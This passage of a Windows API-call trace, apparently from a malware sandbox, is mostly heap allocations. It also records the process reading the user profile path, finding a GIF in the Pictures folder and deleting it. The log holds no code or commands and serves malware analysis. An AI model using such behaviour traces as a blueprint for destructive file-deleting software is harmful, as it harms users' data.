hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0256.062] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0256.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0256.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0256.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0256.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0256.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0256.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0256.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0256.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0256.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0256.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0256.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0256.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0256.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0256.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0256.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0256.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.067] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0256.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0256.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0256.068] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0256.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0256.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0256.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.068] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0256.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0256.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0256.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0256.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0256.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6c) returned 0x240c8d0 [0256.070] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/JP0X848xky.gif", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\JP0X848xky.gif", lpFilePart=0x8bedfc*="JP0X848xky.gif") returned 0x35 [0256.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0256.070] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\JP0X848xky.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jp0x848xky.gif")) returned 0x20 [0256.070] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\JP0X848xky.gif", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf3f0b60, ftCreationTime.dwHighDateTime=0x1d4d475, ftLastAccessTime.dwLowDateTime=0x8abfc350, ftLastAccessTime.dwHighDateTime=0x1d4cda8, ftLastWriteTime.dwLowDateTime=0x8abfc350, ftLastWriteTime.dwHighDateTime=0x1d4cda8, nFileSizeHigh=0x0, nFileSizeLow=0x695b, dwReserved0=0x1611, dwReserved1=0x4, cFileName="JP0X848xky.gif", cAlternateFileName="JP0X84~1.GIF")) returned 0xaa58a0 [0256.070] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\JP0X848xky.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\jp0x848xky.gif")) returned 1 [0256.072] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf3f0b60, ftCreationTime.dwHighDateTime=0x1d4d475, ftLastAccessTime.dwLowDateTime=0x8abfc350, ftLastAccessTime.dwHighDateTime=0x1d4cda8, ftLastWriteTime.dwLowDateTime=0x8abfc350, ftLastWriteTime.dwHighDateTime=0x1d4cda8, nFileSizeHigh=0x0, nFileSizeLow=0x695b, dwReserved0=0x1611, dwReserved1=0x4, cFileName="JP0X848xky.gif", cAlternateFileName="JP0X84~1.GIF")) returned 0 [0256.072] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0256.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.072] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0256.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0256.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0256.073] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0256.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0256.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0256.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0256.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.073] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0256.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0256.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0256.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0256.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0256.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0256.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0256.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0256.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6c) returned 